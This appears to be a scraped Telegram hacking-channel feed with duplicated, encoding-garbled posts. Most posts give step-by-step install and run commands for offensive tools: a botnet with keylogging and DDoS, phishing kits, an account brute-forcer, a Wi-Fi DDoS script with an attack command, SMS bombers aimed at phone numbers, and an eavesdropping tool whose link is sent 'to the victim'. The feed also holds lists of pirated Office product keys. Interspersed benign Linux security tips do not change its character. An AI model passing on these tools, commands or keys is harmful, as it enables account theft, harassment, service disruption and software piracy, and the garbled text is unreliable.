Forwarded from UNDERCODE SECURITY
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦UBoat - Proof of the PoC HTTP Botnet Design Concept
TOOLS + INSTALL :
t.me/UndercodeTesting
1οΈβ£ UBoat is a PoC HTTP botnet designed to replicate a full combat commercial botnet, such as the famous large-scale infectors Festi, Grum, Zeus and SpyEye.
2οΈβ£Surveys of popular botnets have shown that HTTP-based botnets have a set of attributes that make them difficult to detect.
> On the other hand, the number of studies devoted to identifying HTTP-based botnets is relatively small (compared to the number of studies based on IRC and P2P botnets), especially in HTTP-based mobile botnets that run on mobile devices and networks. The main goal of creating UBoat was to help security researchers and improve their understanding of HTTP loader-style commercial botnets so that effective countermeasures can be developed.
3οΈβ£features :
> C ++ encoded without any dependencies Encrypted C&C
>Communications Persistence to prevent the loss of your control
>Connection redundancy (uses server backup address or domain) DDoS
>Methods (TCP & UDP Flood) Task creation system (changing the HWID
system, country, IP, OS. System)
>remote command Updating and removing other malware
> Download and execute other malware
> Active and passive keylogger
>Enable Windows RDP Plugin system for quick feature updates
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
> detailed tutorial + pictures https://github.com/UBoat-Botnet/UBoat/wiki/Panel-Setup
ENJOY β€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦UBoat - Proof of the PoC HTTP Botnet Design Concept
TOOLS + INSTALL :
t.me/UndercodeTesting
1οΈβ£ UBoat is a PoC HTTP botnet designed to replicate a full combat commercial botnet, such as the famous large-scale infectors Festi, Grum, Zeus and SpyEye.
2οΈβ£Surveys of popular botnets have shown that HTTP-based botnets have a set of attributes that make them difficult to detect.
> On the other hand, the number of studies devoted to identifying HTTP-based botnets is relatively small (compared to the number of studies based on IRC and P2P botnets), especially in HTTP-based mobile botnets that run on mobile devices and networks. The main goal of creating UBoat was to help security researchers and improve their understanding of HTTP loader-style commercial botnets so that effective countermeasures can be developed.
3οΈβ£features :
> C ++ encoded without any dependencies Encrypted C&C
>Communications Persistence to prevent the loss of your control
>Connection redundancy (uses server backup address or domain) DDoS
>Methods (TCP & UDP Flood) Task creation system (changing the HWID
system, country, IP, OS. System)
>remote command Updating and removing other malware
> Download and execute other malware
> Active and passive keylogger
>Enable Windows RDP Plugin system for quick feature updates
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
> detailed tutorial + pictures https://github.com/UBoat-Botnet/UBoat/wiki/Panel-Setup
ENJOY β€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Interesting useful hacking tools 2020
- KsDumper - Dumping Processes Using The Power Of Kernel Space
- YARASAFE - Automatic Binary Function Similarity Checks with Yara
- AlertResponder - Automatic Security Alert Response Framework By AWS Serverless Application Model
- TAS - A Tiny Framework For Easily Manipulate The Tty And Create Fake Binaries
- Corsy v1.0 - CORS Misconfiguration Scanner
- TeleGram-Scraper - Telegram Group Scraper Tool (Fetch All Information About Group Members)
- Grouper2 - Find Vulnerabilities In AD Group Policy
- Gophish - Open-Source Phishing Toolkit
- Aaia - AWS Identity And Access Management Visualizer And Anomaly Finder
- Scallion - GPU-based Onion Addresses Hash Generator
- Bluewall - A Firewall Framework Designed For Offensive And Defensive Cyber Professionals
- AntiCheat-Testing-Framework - Framework To Test Any Anti-Cheat
- Gowitness - A Golang, Web Screenshot Utility Using Chrome Headless
- Lsassy - Extract Credentials From Lsass Remotely
- LOLBITS - C# Reverse Shell Using Background Intelligent Transfer Service (BITS) As Communication Protocol
- Shell Backdoor List - PHP / ASP Shell Backdoor List
- Hakrawler - Simple, Fast Web Crawler Designed For Easy, Quick Discovery Of Endpoints And Assets Within A Web Application
- Gtfo - Search For Unix Binaries That Can Be Exploited To Bypass System Security Restrictions
Enjoy β€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Interesting useful hacking tools 2020
- KsDumper - Dumping Processes Using The Power Of Kernel Space
- YARASAFE - Automatic Binary Function Similarity Checks with Yara
- AlertResponder - Automatic Security Alert Response Framework By AWS Serverless Application Model
- TAS - A Tiny Framework For Easily Manipulate The Tty And Create Fake Binaries
- Corsy v1.0 - CORS Misconfiguration Scanner
- TeleGram-Scraper - Telegram Group Scraper Tool (Fetch All Information About Group Members)
- Grouper2 - Find Vulnerabilities In AD Group Policy
- Gophish - Open-Source Phishing Toolkit
- Aaia - AWS Identity And Access Management Visualizer And Anomaly Finder
- Scallion - GPU-based Onion Addresses Hash Generator
- Bluewall - A Firewall Framework Designed For Offensive And Defensive Cyber Professionals
- AntiCheat-Testing-Framework - Framework To Test Any Anti-Cheat
- Gowitness - A Golang, Web Screenshot Utility Using Chrome Headless
- Lsassy - Extract Credentials From Lsass Remotely
- LOLBITS - C# Reverse Shell Using Background Intelligent Transfer Service (BITS) As Communication Protocol
- Shell Backdoor List - PHP / ASP Shell Backdoor List
- Hakrawler - Simple, Fast Web Crawler Designed For Easy, Quick Discovery Of Endpoints And Assets Within A Web Application
- Gtfo - Search For Unix Binaries That Can Be Exploited To Bypass System Security Restrictions
Enjoy β€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
KitPloit - PenTest & Hacking Tools
KsDumper - Dumping Processes Using The Power Of Kernel Space
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦LINUX TIPS
1οΈβ£Never use weak passwords
For some reason, everyone thinks that the attacker does not want to pick up your password. Perhaps he really will not do it. But in case of server compromise, the cracker will receive a file with password hashes of all users. When trying to recover hash values, weak passwords are the first to succumb. And given that many users often use the same password wherever possible, the consequences can be sad.
Password must be at least 11 characters long, contain letters in both registers, numbers and special characters. You canβt think of such a password - use the password generator.
Learn to remember passwords, and not write them on a piece of paper and sculpt to the monitor.
2οΈβ£Set a password on the BIOS
A BIOS password, in some cases, can make it difficult for an attacker to access your data.
3οΈβ£ Be sure to disable unused services
Do not use ssh? Disconnect! Is the web server running? Do you really need it? If you do not know how to display a list of working services and disable some of them, use auxiliary software.
4οΈβ£Update quickly and completely.
Install all patches that are related to security. Try to update as quickly as possible. Holes are often found in programs and while the user thinks about the need to update (and some even postpone updates for several days), vulnerabilities in programs are exploited, rootkits are installed, which are then quite difficult to clean up.
By the way, there is a funny Linux Mint distribution in which security updates are divided into categories: βit can be installedβ, βyou can wait with itβ and βbut you can not install it at allβ. If you need security, then avoid using such distributions.
5οΈβ£There are also enemies in LAN
Do not trust local network users. Many provide the resources of their computer to users from the local network. This approach to security policy is partially justified, because itβs easier for a local attacker to calculate and put a stool on his head, which stops many potential hackers. But an attacker from an external network can gain access to one of the computers on the local network and launch attacks from him.
6οΈβ£ Protect your privacy
Learn the built-in security features of your distribution. Many distributions provide the ability to remove traces of user activity, as browsers allow you to delete the cache and browsing history. For example, in Ubuntu, you can go to "System Preferences" and select "Privacy" to indicate what types of user activity should not be monitored.
7οΈβ£Use encryption. Whenever possible
Many programs have an option to encrypt data. Carefully study all the features provided and see how they could help you strengthen the overall security of the system. Encryption complicates an inconspicuous data substitution and protects police officers from unnecessary questions when they come to seize your computer.
Enjoy β€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦LINUX TIPS
1οΈβ£Never use weak passwords
For some reason, everyone thinks that the attacker does not want to pick up your password. Perhaps he really will not do it. But in case of server compromise, the cracker will receive a file with password hashes of all users. When trying to recover hash values, weak passwords are the first to succumb. And given that many users often use the same password wherever possible, the consequences can be sad.
Password must be at least 11 characters long, contain letters in both registers, numbers and special characters. You canβt think of such a password - use the password generator.
Learn to remember passwords, and not write them on a piece of paper and sculpt to the monitor.
2οΈβ£Set a password on the BIOS
A BIOS password, in some cases, can make it difficult for an attacker to access your data.
3οΈβ£ Be sure to disable unused services
Do not use ssh? Disconnect! Is the web server running? Do you really need it? If you do not know how to display a list of working services and disable some of them, use auxiliary software.
4οΈβ£Update quickly and completely.
Install all patches that are related to security. Try to update as quickly as possible. Holes are often found in programs and while the user thinks about the need to update (and some even postpone updates for several days), vulnerabilities in programs are exploited, rootkits are installed, which are then quite difficult to clean up.
By the way, there is a funny Linux Mint distribution in which security updates are divided into categories: βit can be installedβ, βyou can wait with itβ and βbut you can not install it at allβ. If you need security, then avoid using such distributions.
5οΈβ£There are also enemies in LAN
Do not trust local network users. Many provide the resources of their computer to users from the local network. This approach to security policy is partially justified, because itβs easier for a local attacker to calculate and put a stool on his head, which stops many potential hackers. But an attacker from an external network can gain access to one of the computers on the local network and launch attacks from him.
6οΈβ£ Protect your privacy
Learn the built-in security features of your distribution. Many distributions provide the ability to remove traces of user activity, as browsers allow you to delete the cache and browsing history. For example, in Ubuntu, you can go to "System Preferences" and select "Privacy" to indicate what types of user activity should not be monitored.
7οΈβ£Use encryption. Whenever possible
Many programs have an option to encrypt data. Carefully study all the features provided and see how they could help you strengthen the overall security of the system. Encryption complicates an inconspicuous data substitution and protects police officers from unnecessary questions when they come to seize your computer.
Enjoy β€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦for beginers Hacking VK, insty etc. using phishing
-similar sended tools : hiddeneye - shellphisher-
#fAstTips
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦for beginers Hacking VK, insty etc. using phishing
-similar sended tools : hiddeneye - shellphisher-
#fAstTips
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
updateuse for learn
2οΈβ£apt upgrade
3οΈβ£apt install git -y
4οΈβ£pkg up
5οΈβ£pkg install curl
6οΈβ£pkg install php
7οΈβ£pkg install wget
8οΈβ£git clone git: //github.com/htr-tech/nexphisher.git
9οΈβ£cd nexphisher
πbash tmux_setup
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
β β β Uππ»βΊπ«6π¬πβ β β β
π¦2020 from 10 days Bruteforce accounts sayat.me
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£install for Linux
1) apt-get update && apt-get install git && apt-get install python3 && apt-get install python3-pip --fix-missing
2) git clone https://github.com/termux-lab/SayatBrute
3) cd SayatBrute
4) pip3 install colorama && pip3 install requests
5) python3 main.py
2οΈβ£install for Windows
1) Download Python3
2) Download Git
3) git clone https://github.com/termux-lab/SayatBrute
4) pip install colorama
5) pip install requests
6) cd SayatBrute
7) python main.py
3οΈβ£install for Termux
1) pkg install python && pkg install git
2) pip3 install colorama && pip3 install requests
3) cd SayatBrute
4) git clone https://github.com/termux-lab/SayatBrute
5) python3 main.py
ENJOY β€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦2020 from 10 days Bruteforce accounts sayat.me
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£install for Linux
1) apt-get update && apt-get install git && apt-get install python3 && apt-get install python3-pip --fix-missing
2) git clone https://github.com/termux-lab/SayatBrute
3) cd SayatBrute
4) pip3 install colorama && pip3 install requests
5) python3 main.py
2οΈβ£install for Windows
1) Download Python3
2) Download Git
3) git clone https://github.com/termux-lab/SayatBrute
4) pip install colorama
5) pip install requests
6) cd SayatBrute
7) python main.py
3οΈβ£install for Termux
1) pkg install python && pkg install git
2) pip3 install colorama && pip3 install requests
3) cd SayatBrute
4) git clone https://github.com/termux-lab/SayatBrute
5) python3 main.py
ENJOY β€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
GitHub
GitHub - termux-lab/SayatBrute
Contribute to termux-lab/SayatBrute development by creating an account on GitHub.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦arrange a DDoS attack on Wi-Fi from the phone
> DDoS is a hacker attack on a computer system in order to bring it to failure, that is, the creation of conditions under which users of the system will not be able to access the provided system resources (servers), or this access will be difficult.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£pkg upgrade
2οΈβ£pkg install python python2 git
3οΈβ£cd
4οΈβ£git clone https://github.com/artem-cell/wifi-dosser
5οΈβ£cd wifi-dosser
6οΈβ£pip2 install requests mechanize
7οΈβ£ls
8οΈβ£python2 wifi-ddoser.py
9οΈβ£To carry out an attack, you need to connect to a router. Next, enter the command below.
> python2 wifi-ddoser.py example.com 80 3 999999999999
π80 and 3 are standard ports
1οΈβ£1οΈβ£999999999999 is the attack time in seconds
1οΈβ£2οΈβ£To stop the attack, you need to restart the router
use for learn
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦arrange a DDoS attack on Wi-Fi from the phone
> DDoS is a hacker attack on a computer system in order to bring it to failure, that is, the creation of conditions under which users of the system will not be able to access the provided system resources (servers), or this access will be difficult.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£pkg upgrade
2οΈβ£pkg install python python2 git
3οΈβ£cd
4οΈβ£git clone https://github.com/artem-cell/wifi-dosser
5οΈβ£cd wifi-dosser
6οΈβ£pip2 install requests mechanize
7οΈβ£ls
8οΈβ£python2 wifi-ddoser.py
9οΈβ£To carry out an attack, you need to connect to a router. Next, enter the command below.
> python2 wifi-ddoser.py example.com 80 3 999999999999
π80 and 3 are standard ports
1οΈβ£1οΈβ£999999999999 is the attack time in seconds
1οΈβ£2οΈβ£To stop the attack, you need to restart the router
use for learn
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Install Wireshark in Termux full by undercode:
1) First install x11-repo and nano
2) pkg update
3) pkg upgrade -y
4) pkg install x11-repo
5) pkg install nano
6) Now install xterm
7) pkg install xterm
8) tigervnc and Wireshark
9) pkg install tigervnc
10) pkg install wireshark-gtk
11) Now we need to change one file
12) cd $ HOME
13) nano ../usr/etc/bash.bashrc
14) We go to the very end of the file and write
15) export DISPLAY = ": 1
16) Save - ctrl + x, y, enter
> Now we write
17) source ../usr/etc/bash.bashrc
18) vncserver
19) At the first start, you will be asked to enter a password.
127.0.0.1::5901
20) If when creating vnc in termux you had written localhost: 2, then instead of 1 we write 2, with the remaining numbers the same way.
21) In the name field, at least.
22) It remains only to connect, you will be asked to enter the password that you entered when you first created the vnc server.
use for learn
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Install Wireshark in Termux full by undercode:
1) First install x11-repo and nano
2) pkg update
3) pkg upgrade -y
4) pkg install x11-repo
5) pkg install nano
6) Now install xterm
7) pkg install xterm
8) tigervnc and Wireshark
9) pkg install tigervnc
10) pkg install wireshark-gtk
11) Now we need to change one file
12) cd $ HOME
13) nano ../usr/etc/bash.bashrc
14) We go to the very end of the file and write
15) export DISPLAY = ": 1
16) Save - ctrl + x, y, enter
> Now we write
17) source ../usr/etc/bash.bashrc
18) vncserver
19) At the first start, you will be asked to enter a password.
127.0.0.1::5901
20) If when creating vnc in termux you had written localhost: 2, then instead of 1 we write 2, with the remaining numbers the same way.
21) In the name field, at least.
22) It remains only to connect, you will be asked to enter the password that you entered when you first created the vnc server.
use for learn
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Universal Installer Termux Fsociety
what this great tool can do ?
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) pkg update
2) pkg upgrade -y
3) git clone https://github.com/Manisso/fsociety
4) cd fsociety
5) . /install.sh
6) python2 fsociety.py
π¦Menu
1. collection of information
2.Password Attacks
3.Wireless Testing
4. Operation Tools
5.Sniffing & Spoofing
6.Web Hack
7. Private Web Hacking
8.After Operation
0.install updates
99.output
enjoyβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Universal Installer Termux Fsociety
what this great tool can do ?
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) pkg update
2) pkg upgrade -y
3) git clone https://github.com/Manisso/fsociety
4) cd fsociety
5) . /install.sh
6) python2 fsociety.py
π¦Menu
1. collection of information
2.Password Attacks
3.Wireless Testing
4. Operation Tools
5.Sniffing & Spoofing
6.Web Hack
7. Private Web Hacking
8.After Operation
0.install updates
99.output
enjoyβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
GitHub
GitHub - Manisso/fsociety: fsociety Hacking Tools Pack β A Penetration Testing Framework
fsociety Hacking Tools Pack β A Penetration Testing Framework - Manisso/fsociety
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Termux INSTALL NMAP :
1οΈβ£
-sP check if ip address is available.
-PN consider all hosts to be working even if they are not working.
-sS / sT / sA / sM / sW scan tcp ports.
-sU scan udp ports.
-sN / sF / sX - TCP NULL and FIN scan.
-sC run the default script.
-sI Indle scan.
-p specify the range of ports to check.
-sV port exploration for verifying service versions.
-O define the operating system.
-T 0-5 scan speed, the more the faster.
-D mask the scan using dummy IP.
-S change your IP address to the specified one.
-e use a specific interface.
--spoof-mac set your MAC address.
-A definition of the operating system using spec. scripts.
enjoyβ€οΈππ»
#FastTips
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Termux INSTALL NMAP :
1οΈβ£
pkg update
2οΈβ£pkg upgrade - y
3οΈβ£pkg install nmap
4οΈβ£Launch command
> nmap options ip_address
5οΈβ£And now I will show you the main functions of nmap :
-sL create a list of running hosts.-sP check if ip address is available.
-PN consider all hosts to be working even if they are not working.
-sS / sT / sA / sM / sW scan tcp ports.
-sU scan udp ports.
-sN / sF / sX - TCP NULL and FIN scan.
-sC run the default script.
-sI Indle scan.
-p specify the range of ports to check.
-sV port exploration for verifying service versions.
-O define the operating system.
-T 0-5 scan speed, the more the faster.
-D mask the scan using dummy IP.
-S change your IP address to the specified one.
-e use a specific interface.
--spoof-mac set your MAC address.
-A definition of the operating system using spec. scripts.
enjoyβ€οΈππ»
#FastTips
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
Low-Level Windows API Access From PowerShell.pdf
778.2 KB
Low-Level Windows API Access From PowerShell #tutorial
β β β Uππ»βΊπ«6π¬πβ β β β
π¦2020 sms spam Bomber :
After entering the command, wait until $ lights up , if it does not light up, and a question pops up - I wrote about this below, when it caught fire we enter the following commands.
All commands are entered with a capital letter, I advise you to copy
If you entered at least one character incorrectly, then nothing will work.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) pkg update
2) pkg upgrade
3) pkg install git
4) pkg install python
5) pkg install python clang make -y
6) pip install --upgrade pip (itβs important that there is a 2 dash)
7) git clone https://github.com/crinny/b0mb3r
8) pip3 install b0mb3r -U
use for learn
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦2020 sms spam Bomber :
After entering the command, wait until $ lights up , if it does not light up, and a question pops up - I wrote about this below, when it caught fire we enter the following commands.
All commands are entered with a capital letter, I advise you to copy
If you entered at least one character incorrectly, then nothing will work.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) pkg update
2) pkg upgrade
3) pkg install git
4) pkg install python
5) pkg install python clang make -y
6) pip install --upgrade pip (itβs important that there is a 2 dash)
7) git clone https://github.com/crinny/b0mb3r
8) pip3 install b0mb3r -U
use for learn
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦SayHello Or how to eavesdrop-For Beginers.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦SayHello Or how to eavesdrop-For Beginers.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
update && apt upgradeuse for learn
2οΈβ£pkg install openssh git php wget
3οΈβ£When asked about the continuation we answer y
4οΈβ£git clone https://github.com/thelinuxchoice/sayhello.git
Launch
5οΈβ£cd sayhello
6οΈβ£chmod + x sayhello.sh
7οΈβ£./ sayhello.sh
8οΈβ£Choose ngrok
9οΈβ£We throw the link to the victim.
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦2020 Free SMS bomber on Android 100ms in 20 secondsπ₯
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦2020 Free SMS bomber on Android 100ms in 20 secondsπ₯
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
updateuse for learn
2οΈβ£apt upgrade
3οΈβ£pkg install python
4οΈβ£pip install --upgrade pip
5οΈβ£apt install git
6οΈβ£git clone https://github.com/FSystem88/spymer
7οΈβ£sh spymer / install.sh
8οΈβ£After you better go to Termux.
9οΈβ£Launch: spymer 7988 ********* (we indicate the number through 7 without +)
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
β β β Uππ»βΊπ«6π¬πβ β β β
Microsoft Office 2020 Keys(Wiki-2020 keys)
π¦Office 365 Keys for FREE
N7PXY-WR4XP-D4FGK-K66JH-CYQ6X
N4M7D-PD46X-TJ2HQ-RPDD7-T28P9
B9GN2-DXXQC-9DHKT-GGWCR-4X6XK
2B8KN-FFK6J-YWMV4-J3DY2-3YF29
FCMXC-RDWMP-RFGVD-8TGPD-
VQQ2X
4HNBK-863MH-6CR6P-GQ6WP-J42C9
2MNJP-QY9KX-MKBKM-9VFJ2-CJ9KK
XRNFT-HG2FV-G74BP-7PVDC-JB29K
DJD94-DFKD9-FJD94JD894-FJKD94JD
DJC4N-DX7PC-GM3GK-V8KKW-XWYGX
DJKSE-DFJS93-DFJKD94JD-DJKD94JD
6KTFN-PQH9H T8MMB-YG8K4-367TX
6PMNJ-Q33T3-VJQFJ-23D3H-6XVTX
PGD67-JN23K-JGVWW-KTHP4-GXR9G
PBTFM-WWN3H-2GD9X-VJRMG-C9VT
MT7YN-TMV9C-7DDX9-64W77-B7R4D
π¦Microsoft Office 365 Pro Plus Product Key
4HNBK-863MH-6CR6P-GQ6WP-J42C9
366NX-BQ62X-PQT9G-GPX4H-VT7TX
6KTFN-PQH9H T8MMB-YG8K4-367TX
KDVQM-HMNFJ-P9PJX-96HDF-DJYGX
KBDNM-R8CD9-RK366-WFM3X-C7GXK
H746C-BM4VK-TZBB8-MVZH8-FXR32
MH2KN-96KYR-GTRD4-KBKP4-Q9JP9
2MHJR-V4MR2-V4Z2Y-72MQ7-KC6XK
2MNJP-QY9KX-MKBKM-9VFJ2-CJ9KK
P8TFP-JGFMM-XPV3X-3FQM2-8K4RP
N4M7D-PD46X-TJ2HQ-RPDD7-T28P9
FBFPP-2XG5Y-FG9VH-DVQ2Z-QJRCH
NK8R7-8VXCQ 3M2FM-8446R-WFD6X
π¦Microsoft Office 365 Activation Key
MTDNG-PDDGD-MHMV4-F2MBY-RCXKK
DJC4N-DX7PC-GM3GK-V8KKW-XWYGX
46DNX-B4Q98-PQVPW-Q8VM6-FVR29
N4M7D-PD46X-TJ2HQ-RPDD7-T28P9
GYWDG-NMV9P-746HR-Y2VQW-YPXKK
PBTFM-WWN3H-2GD9X-VJRMG-C9VTX
2MNJP-QY9KX-MKBKM-9VFJ2-CJ9KK
NK8R7-8VXCQ 3M2FM-8446R-WFD6X
N7PXY-WR4XP-D4FGK-K66JH-CYQ6X
GPT9W-CWNJK-KB29G-8V93J-TQ429
366NX-BQ62X-PQT9G-GPX4H-VT7TX
4HNBK-863MH-6CR6P-GQ6WP-J42C9
MH2KN-96KYR-GTRD4-KBKP4-Q9JP9
X2YWD-NWJ42-3PGD6-M37DP-VFP9K
N2P94-XV8HD-W9MHF-VQHHH-M4D6X
π¦Office 365 Product Key
2B8KN-FFK6J-YWMV4-J3DY2-3YF29
KBDNM-R8CD9-RK366-WFM3X-C7GXK
6HDB9-BNRGY-J3F83-CF43C-D67TX
WTFN9-KRCBV-2VBBH-BC272-27GXM
6KTFN-PQH9H T8MMB-YG8K4-367TX
KDVQM-HMNFJ-P9PJX-96HDF-
DJYGX
XRNFT-HG2FV-G74BP-7PVDC-JB29K
PNP4F-KY64B-JJF4P-7R7J9-7XJP9
DMXHM-GNMM3-MYHHK-6TVT2-XTKKK
G9N3P-GRJK6-VM63J-F9M27-KHGXK
7TPNM-PMWKF-WVHKV-G869H-9BQ6X
433NF-H7TMK-TPMPK-W4FGW-7FP9K
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
Microsoft Office 2020 Keys(Wiki-2020 keys)
π¦Office 365 Keys for FREE
N7PXY-WR4XP-D4FGK-K66JH-CYQ6X
N4M7D-PD46X-TJ2HQ-RPDD7-T28P9
B9GN2-DXXQC-9DHKT-GGWCR-4X6XK
2B8KN-FFK6J-YWMV4-J3DY2-3YF29
FCMXC-RDWMP-RFGVD-8TGPD-
VQQ2X
4HNBK-863MH-6CR6P-GQ6WP-J42C9
2MNJP-QY9KX-MKBKM-9VFJ2-CJ9KK
XRNFT-HG2FV-G74BP-7PVDC-JB29K
DJD94-DFKD9-FJD94JD894-FJKD94JD
DJC4N-DX7PC-GM3GK-V8KKW-XWYGX
DJKSE-DFJS93-DFJKD94JD-DJKD94JD
6KTFN-PQH9H T8MMB-YG8K4-367TX
6PMNJ-Q33T3-VJQFJ-23D3H-6XVTX
PGD67-JN23K-JGVWW-KTHP4-GXR9G
PBTFM-WWN3H-2GD9X-VJRMG-C9VT
MT7YN-TMV9C-7DDX9-64W77-B7R4D
π¦Microsoft Office 365 Pro Plus Product Key
4HNBK-863MH-6CR6P-GQ6WP-J42C9
366NX-BQ62X-PQT9G-GPX4H-VT7TX
6KTFN-PQH9H T8MMB-YG8K4-367TX
KDVQM-HMNFJ-P9PJX-96HDF-DJYGX
KBDNM-R8CD9-RK366-WFM3X-C7GXK
H746C-BM4VK-TZBB8-MVZH8-FXR32
MH2KN-96KYR-GTRD4-KBKP4-Q9JP9
2MHJR-V4MR2-V4Z2Y-72MQ7-KC6XK
2MNJP-QY9KX-MKBKM-9VFJ2-CJ9KK
P8TFP-JGFMM-XPV3X-3FQM2-8K4RP
N4M7D-PD46X-TJ2HQ-RPDD7-T28P9
FBFPP-2XG5Y-FG9VH-DVQ2Z-QJRCH
NK8R7-8VXCQ 3M2FM-8446R-WFD6X
π¦Microsoft Office 365 Activation Key
MTDNG-PDDGD-MHMV4-F2MBY-RCXKK
DJC4N-DX7PC-GM3GK-V8KKW-XWYGX
46DNX-B4Q98-PQVPW-Q8VM6-FVR29
N4M7D-PD46X-TJ2HQ-RPDD7-T28P9
GYWDG-NMV9P-746HR-Y2VQW-YPXKK
PBTFM-WWN3H-2GD9X-VJRMG-C9VTX
2MNJP-QY9KX-MKBKM-9VFJ2-CJ9KK
NK8R7-8VXCQ 3M2FM-8446R-WFD6X
N7PXY-WR4XP-D4FGK-K66JH-CYQ6X
GPT9W-CWNJK-KB29G-8V93J-TQ429
366NX-BQ62X-PQT9G-GPX4H-VT7TX
4HNBK-863MH-6CR6P-GQ6WP-J42C9
MH2KN-96KYR-GTRD4-KBKP4-Q9JP9
X2YWD-NWJ42-3PGD6-M37DP-VFP9K
N2P94-XV8HD-W9MHF-VQHHH-M4D6X
π¦Office 365 Product Key
2B8KN-FFK6J-YWMV4-J3DY2-3YF29
KBDNM-R8CD9-RK366-WFM3X-C7GXK
6HDB9-BNRGY-J3F83-CF43C-D67TX
WTFN9-KRCBV-2VBBH-BC272-27GXM
6KTFN-PQH9H T8MMB-YG8K4-367TX
KDVQM-HMNFJ-P9PJX-96HDF-
DJYGX
XRNFT-HG2FV-G74BP-7PVDC-JB29K
PNP4F-KY64B-JJF4P-7R7J9-7XJP9
DMXHM-GNMM3-MYHHK-6TVT2-XTKKK
G9N3P-GRJK6-VM63J-F9M27-KHGXK
7TPNM-PMWKF-WVHKV-G869H-9BQ6X
433NF-H7TMK-TPMPK-W4FGW-7FP9K
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Facebook re-exposed vulnerability: sharing user data with developers overtime
> Sina Technology News Beijing time on July 2 morning news, after the "Cambridge Analysis Scandal" was exposed, FacebookThere was a promise to impose a time limit when sharing user data with external developers, but the actual deadline exceeded their original promise.
> The company previously stated that if the user does not interact with the developer for more than 90 days, it will prevent the application from obtaining user data. At that time, developers need to re-acquire permission to get access to data such as e-mail, birthday and city,
